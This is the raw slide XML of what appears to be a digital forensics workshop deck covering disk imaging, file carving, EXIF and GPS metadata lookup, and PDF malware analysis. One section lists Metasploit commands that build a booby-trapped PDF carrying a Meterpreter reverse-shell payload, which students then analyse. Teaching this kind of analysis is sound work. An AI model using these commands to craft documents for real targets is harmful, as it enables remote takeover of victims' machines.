              <a:rPr lang="id-ID" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> –c “%.6f” ibiza.jpg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0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Search Location by GPS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Using OpenStreetMap to view visually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Browser to URL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://openstreetmap.org</a:t>
            </a:r>
            <a:endParaRPr lang="id-ID" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="id-ID" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>38.909833 N, 1.438667 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>E </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>to search box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Click Go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See the map</a:t>
            </a:r>
            <a:endParaRPr lang="id-ID" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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830356"/>
            <a:ext cx="3990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Get JSON format data from OpenStreetmap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In Browser go </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>to URL: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="id-ID" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="id-ID" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://nominatim.openstreetmap.org/reverse?format=json&amp;lat=38.909833&amp;lon=1.438667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</a:rPr>
              <a:t>In Terminal use following command:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1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$ curl “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://nominatim.openstreetmap.org/reverse?format=json&amp;lat=38.909833&amp;lon=1.438667</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”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53999" cy="27815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0x4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Document Analysis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Objectives</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: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Learn &amp; dissect simple PDF structure.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Dump malware from PDF</a:t>
            </a:r>
          </a:p>
          <a:p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Tools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pdfid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peepdf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Overview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Engage in practical forensic activity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Acquisition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Disk Imaging &amp; Hashing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Analysis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File Carving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Document Analysis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Image Analysis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7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Preliminary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msfconsole</a:t>
            </a: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m</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sf&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>exploit/windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fileformat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adobe_utilprintf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msf&gt;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set FILENAME kumpulan-link-asoy.pdf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msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;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set PAYLOAD windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>meterpreter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reverse_tcp</a:t>
            </a:r>
            <a:endParaRPr lang="id-ID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msf&gt;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set LHOST 192.168.88.241</a:t>
            </a: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msf&gt;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set LPORT 13510</a:t>
            </a:r>
            <a:endParaRPr lang="id-ID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msf&gt;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exploit</a:t>
            </a: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0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General Approach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Locate suspicious tag and potentially malicious embedded code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="id-ID" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Shellcode, VBA macros, JavaScript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Extract suspicious code segments from the file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Disassemble or shellcode if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42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Hands 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pdfid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kumpulan-link-asoy.pdf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peepdf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kumpulan-link-asoy.pdf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rest is analysist</a:t>
            </a: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Assumption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Have understanding of simple UNIX command (explained in previous workshop)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0x1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Disk Imaging &amp; Hashing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bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Objectives: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Understanding disk, layout, and partition.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create a disk image (RAW, EWF, AFF) containing data.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View the hashes and verify the integrity of the disk image.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Can mount disk image.</a:t>
            </a:r>
            <a:endParaRPr lang="id-ID" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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Tools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solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dcfldd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Dd_rescue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dd</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="id-ID" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Libewf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="id-ID" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AFFlib</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="id-ID" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ssdeep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Preliminary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cd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> /root</a:t>
            </a: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$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export</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> DFW=forensic_workshop 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mkdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> $DFW &amp;&amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> $DFW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mkdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> RAW EWF AFF</a:t>
            </a:r>
          </a:p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echo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> –n “dracOs Forensic Workshop” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> A.txt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cp </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A.txt B.txt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$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rgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>echo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> “!” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>B.txt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Disk, Layout, and Partition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FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Disk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> – storage device to store and retrieve digital information.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Layout: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MBR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> vs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>GPT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="id-ID" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Partition</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> – regions on hard disk which can be managed by operating system separately.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Kind of non-volatile memory.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http://xathrya.id/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7E2E-C97A-4AC8-B258-3D07B8F7E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1253</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>304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dracOs Forensic Flavor</vt:lpstr>
      <vt:lpstr># whoami?</vt:lpstr>
      <vt:lpstr>Organization</vt:lpstr>
      <vt:lpstr>Overview</vt:lpstr>
      <vt:lpstr>Assumption</vt:lpstr>
      <vt:lpstr>0x1 Disk Imaging &amp; Hashing</vt:lpstr>
      <vt:lpstr>Tools</vt:lpstr>
      <vt:lpstr>Preliminary</vt:lpstr>
      <vt:lpstr>Disk, Layout, and Partition </vt:lpstr>
      <vt:lpstr>Viewing Partition in Linux</vt:lpstr>
      <vt:lpstr>Terminology</vt:lpstr>
      <vt:lpstr>Terminology (2)</vt:lpstr>
      <vt:lpstr>Disk Imaging (RAW)</vt:lpstr>
      <vt:lpstr>Hashing &amp;Verification of Integrity</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Disk Imaging (RAW)</vt:lpstr>
      <vt:lpstr>Disk Imaging (RAW)</vt:lpstr>
      <vt:lpstr>Mounting RAW Disk Image?</vt:lpstr>
      <vt:lpstr>Disk Imaging (EWF)</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Disk Imaging (AFF)</vt:lpstr>
      <vt:lpstr>Which Image suites me?</vt:lpstr>
      <vt:lpstr>0x2 File Carving &amp; Extraction</vt:lpstr>
      <vt:lpstr>Tools</vt:lpstr>
      <vt:lpstr>Preliminary</vt:lpstr>
      <vt:lpstr>Terminology</vt:lpstr>
      <vt:lpstr>File Systems?</vt:lpstr>
      <vt:lpstr>File Carving</vt:lpstr>
      <vt:lpstr>0x3 Metadata Extraction</vt:lpstr>
      <vt:lpstr>Tools</vt:lpstr>
      <vt:lpstr>Metadata</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>EXIF &amp; Image</vt:lpstr>
      <vt:lpstr>Extracting EXIF Metadata</vt:lpstr>
      <vt:lpstr>Search Location by GPS </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>0x4 Document Analysis</vt:lpstr>
      <vt:lpstr>Tools</vt:lpstr>
      <vt:lpstr>Preliminary</vt:lpstr>
      <vt:lpstr>General Approach</vt:lpstr>
      <vt:lpstr>Hands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of Cyber Security</dc:title>
  <dc:creator>Satria Ady Pradana</dc:creator>
  <cp:lastModifiedBy>Satria Pradana</cp:lastModifiedBy>
  <cp:revision>210</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-11-23T14:03:47Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-02-21T17:53:54Z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